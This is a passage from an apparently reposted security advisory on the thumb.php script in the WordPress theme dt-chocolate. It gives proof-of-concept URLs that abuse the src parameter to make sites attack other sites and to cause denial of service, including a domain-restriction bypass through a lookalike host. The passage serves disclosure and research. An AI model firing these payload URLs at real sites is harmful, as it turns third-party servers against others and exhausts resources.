http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
DoS (WASC-10):
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
链接:http://seclists.org/fulldisclosure/2013/Jan/215 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! To exploit these issues, an attacker must entice an unsuspecting user to follow a malicious URI.